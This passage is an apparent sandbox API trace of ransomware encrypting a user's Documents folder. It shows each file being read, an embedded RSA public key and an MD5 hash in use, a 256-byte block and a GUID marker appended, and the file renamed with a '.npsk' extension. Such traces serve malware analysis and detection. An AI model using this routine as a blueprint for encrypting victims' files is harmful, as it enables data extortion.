dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.885] WriteFile (in: hFile=0x61c, lpBuffer=0x3214a10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3214a10*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.885] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.885] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.885] CloseHandle (hObject=0x61c) returned 1 [0216.888] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\JTG0e.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\jtg0e.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\JTG0e.xlsx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\jtg0e.xlsx.npsk")) returned 1 [0216.891] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e44e0c0, ftCreationTime.dwHighDateTime=0x1d5e384, ftLastAccessTime.dwLowDateTime=0x25e60c00, ftLastAccessTime.dwHighDateTime=0x1d5e616, ftLastWriteTime.dwLowDateTime=0x25e60c00, ftLastWriteTime.dwHighDateTime=0x1d5e616, nFileSizeHigh=0x0, nFileSizeLow=0x95f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qnfwX.doc", cAlternateFileName="")) returned 1 [0216.891] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\qnfwX.doc") returned=".doc" [0216.891] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\qnfwX.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\qnfwx.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.893] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=38391) returned 1 [0216.893] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.895] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x95d1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.895] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.897] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x95f7, lpOverlapped=0x0) returned 1 [0216.898] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.898] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.898] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.898] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.899] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.899] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.899] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.899] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.899] GetLastError () returned 0x0 [0216.899] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.899] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.900] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.900] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.900] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.900] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0216.901] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x95f7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.901] WriteFile (in: hFile=0x61c, lpBuffer=0x3214a10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3214a10*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.901] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.901] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.901] CloseHandle (hObject=0x61c) returned 1 [0216.903] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\qnfwX.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\qnfwx.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\qnfwX.doc.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\qnfwx.doc.npsk")) returned 1 [0216.905] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x841fc0d0, ftCreationTime.dwHighDateTime=0x1d5e1a3, ftLastAccessTime.dwLowDateTime=0xb6303750, ftLastAccessTime.dwHighDateTime=0x1d5e0c5, ftLastWriteTime.dwLowDateTime=0xb6303750, ftLastWriteTime.dwHighDateTime=0x1d5e0c5, nFileSizeHigh=0x0, nFileSizeLow=0xb25c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qp_X4GQUgzLlhIHWy.ots", cAlternateFileName="QP_X4G~1.OTS")) returned 1 [0216.905] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\qp_X4GQUgzLlhIHWy.ots") returned=".ots" [0216.905] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\qp_X4GQUgzLlhIHWy.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\qp_x4gqugzllhihwy.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.906] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=45660) returned 1 [0216.906] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.908] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xb236, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.908] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.910] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0216.910] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xb25c, lpOverlapped=0x0) returned 1 [0216.911] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.911] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.911] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.911] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.912] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.912] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.912] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.912] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.912] GetLastError () returned 0x0 [0216.912] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.912] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.912] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.912] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.912] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.913] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0216.914] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xb25c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.914] WriteFile (in: hFile=0x61c, lpBuffer=0x3214a10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3214a10*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.914] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.914] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.914] CloseHandle (hObject=0x61c) returned 1 [0216.919] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\qp_X4GQUgzLlhIHWy.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\qp_x4gqugzllhihwy.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\qp_X4GQUgzLlhIHWy.ots.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\qp_x4gqugzllhihwy.ots.npsk")) returned 1 [0216.922] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5b7250, ftCreationTime.dwHighDateTime=0x1d5e756, ftLastAccessTime.dwLowDateTime=0xabab0630, ftLastAccessTime.dwHighDateTime=0x1d5d99e, ftLastWriteTime.dwLowDateTime=0xabab0630, ftLastWriteTime.dwHighDateTime=0x1d5d99e, nFileSizeHigh=0x0, nFileSizeLow=0x16277, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rn-oJ.pps", cAlternateFileName="")) returned 1 [0216.922] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\rn-oJ.pps") returned=".pps" [0216.922] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\rn-oJ.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\rn-oj.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.922] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=90743) returned 1 [0216.922] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.924] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x16251, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.924] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.926] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x16277, lpOverlapped=0x0) returned 1 [0216.928] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.928] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.928] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0216.928] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1ce8) returned 1 [0216.929] CryptCreateHash (in: hProv=0x7b1ce8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0216.929] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0216.929] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0216.929] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0216.929] GetLastError () returned 0x0 [0216.929] CryptDestroyHash (hHash=0x3277d68) returned 1 [0216.929] CryptReleaseContext (hProv=0x7b1ce8, dwFlags=0x0) returned 1 [0216.929] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0216.929] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0216.929] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0216.930] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0216.931] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x16277, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.931] WriteFile (in: hFile=0x61c, lpBuffer=0x3214a10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3214a10*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0216.931] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0216.931] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0216.931] CloseHandle (hObject=0x61c) returned 1 [0216.934] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\rn-oJ.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\rn-oj.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\rn-oJ.pps.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\rn-oj.pps.npsk")) returned 1 [0216.951] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dc4f450, ftCreationTime.dwHighDateTime=0x1d5dc57, ftLastAccessTime.dwLowDateTime=0x2e6fd9c0, ftLastAccessTime.dwHighDateTime=0x1d5e0f1, ftLastWriteTime.dwLowDateTime=0x2e6fd9c0, ftLastWriteTime.dwHighDateTime=0x1d5e0f1, nFileSizeHigh=0x0, nFileSizeLow=0x177e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sURFXqqJWYX.docx", cAlternateFileName="SURFXQ~1.DOC")) returned 1 [0216.951] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\sURFXqqJWYX.docx") returned=".docx" [0216.951] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\y5VbixHYeFSBUXkYrU1j\\4qvrM0-cLvTuNo\\sURFXqqJWYX.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y5vbixhyefsbuxkyru1j\\4qvrm0-clvtuno\\surfxqqjwyx.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0216.954] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=96230) returned 1 [0216.954] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0216.956] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x177c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0216.956] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0216.958] ReadFile (in: 